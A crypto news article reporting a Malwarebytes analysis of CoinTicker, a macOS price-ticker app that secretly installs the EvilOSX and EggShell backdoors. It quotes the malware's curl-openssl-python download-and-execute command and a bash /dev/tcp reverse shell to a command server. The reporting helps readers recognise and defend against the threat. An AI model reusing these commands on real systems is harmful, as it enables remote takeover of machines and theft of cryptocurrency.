CoinTicker, a Mac menu-bar app that presents the latest prices of many cryptocurrencies is installing two backdoors on Mac computers. According to a blog from the Malwarebytes, a forum contributor, 1vladimir, observed that an application called CoinTicker had been installing backdoors onto computer systems after download.
The CoinTicker App Behaviors
The blog further explained that the CoinTicker app, at first seems a reliable application that could likely be beneficial to people who have invested in cryptocurrencies. Once downloaded, the app presents an icon in the menu bar that gives data about the current price of Bitcoin. The app’s options enable the user to modify the display, displaying data about a broad class of cryptocurrencies, such as Bitcoin, Etherium, and Monero.
This functionality appears to be verifiable but in reality, the app is actually installing two backdoors known as EvilOSX and EggShell. These backdoors easily avoid requests for authentication to root because of the apps legitimate behavior. When users launch this app then it downloads and installs parts of two different open-source backdoors: EvilOSX and EggShell. The app performs the following shell command to download a custom-compiled version of the EggShell server for macOS:
nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python /tmp/.info.py
The initial section of the command downloads an encoded file from a Github page relating to a user named “youarenick” and stores that file to a secret file called .info.enc in /private/tmp/. After that, it uses OpenSSL to decode that file into a secret Python file called .info.py. Eventually, it produces the resulting Python script.
The .info.py script executes varied jobs. First, it starts a reverse shell link to a command & control server, using the following command:
nohup bash &> /dev/tcp/188.8.131.52/2280 0>&1
The blog further explained that the hacker’s purpose behind this app is not yet discovered. The malware is spread through a cryptocurrency app, however, it appears likely that the malware is expected to gain access to users’ cryptocurrency wallets for the goal of lifting coins.
This app was plausibly never valid because the app is distributed via a domain named coin-sticker.com. This domain was just registered a few months ago on July 13.
About EvilOSX and EggShell
EvilOSX is a malware posted on GitHub that gives hackers a profoundly customizable attack tool that runs on any old or newer versions of macOS. The project can be downloaded by anyone. It is a remote access trojan, a program that can be utilized to spy on a MacOs user by obtaining things like the system’s webcam, microphone, and screenshot service. It also enables hackers to download personal files without the victim’s knowledge.
EggShell is a post-exploitation malware written in Python language. It provides users a command line concourse with additional functionalities. It also gives attackers the power and ease of uploading/downloading files, tab completion, getting pictures, location tracking, shell command execution, persistence, escalating privileges, password retrieval, and much more.
The post concluded that the fascinating thing about CoinTicker is that it only requires normal user permissions. Root permissions are not required. There is usually an inaccurate over-emphasis on malware’s requirement for root privileges, but this malware is a classic illustration that malware does not need such privileges to have a high potential for risk.
Just a few days ago, The McAfee Labs Threat Report for the month of September 2018 found that malware that involves in cryptocurrency mining using PC’s resources is doubled in Q2 2018 with an 85% increase. McAfee’s research also found that there was an increase in malware attacks targeted at mobile devices. A growing trend for mobile adoption has been noticed across the sector as both CoinMarketCap and Binance Info have released apps for users to access market data on mobile devices. The new Zcash (ZEC) ‘Sapling’ update will reduce the computational power needed for its encryption algorithm zk-SNARKS, which will make mobile transactions using phones a reality.
The notoriety and developing the real-world importance of cryptocurrencies are also attracting cybercriminal attention. Crypto mining malwares are software created to illegally mine cryptocurrency, has nearly doubled in the second quarter of the year, and perpetrators could be building malware explicitly for targeting mobile devices.
Follow us on Twitter, Facebook, Steemit, and join our Telegram channel for the latest blockchain and cryptocurrency news
Shiba Inu to Reach 1$ soon? This New Upcoming Development Proves it Right
Blockchain and Crypto Week In Review
Beware! New Cryptocurrency-Mining Android Malware is Spreading Rapidly
Big News: Ripple Price is about to TRIPLE? This News Confirms…
Crypto Malware found in Adobe Flash Player Updates
North Korea Hacks Crypto Exchange With First-Ever macOS Malware
What is Lost Relics Crypto and How to Get Started?
Shiba Inu Price Prediction: How High can SHIB Price reach by 2030?
Google Bans Cryptocurrency Mining Apps
Siacoin Powered Skynet Comes Online To Disrupt File Sharing
The Big Ripple Price Prediction for 2023 – How high can the XRP price go in 2023?
Cryptocurrency Security -DO’s and DONT’s
Telegram Zero-Day Vulnerability Used By Hackers To Spread Cryptocurrency Miner.
Hacking Group Lazarus Stole $571 Million in Cryptocurrency
Bitcoin Mining on the Mac?
Ripple Price Prediction – How High will XRP reach in 2050?
Quick and Easy Guide to Truffle Crypto
Malware attacks SCADA network to mine cryptocurrency
Tenderly Pro Launches To Cater To DApps And Smart Contracts Needs
You might also like
More from Scam
2022 – A Year in Review: The Top 5 Crypto Stories That Shook The Entire Crypto Market
This article is all about the top 5 crypto stories of 2022. Let's take a look at it in more detail. …
BNB Chain HACK – How did the BNB Exploit lead to $100 million Theft?
What happened with BNB Chain hack? In this article, we delve deeper into how the BNB hack happened and what …
Timeless Investments – Carlito NFT RipOff?
Many NFT drops are turning out to be a scam after some time. Let's assess why the Carlito NFT scam …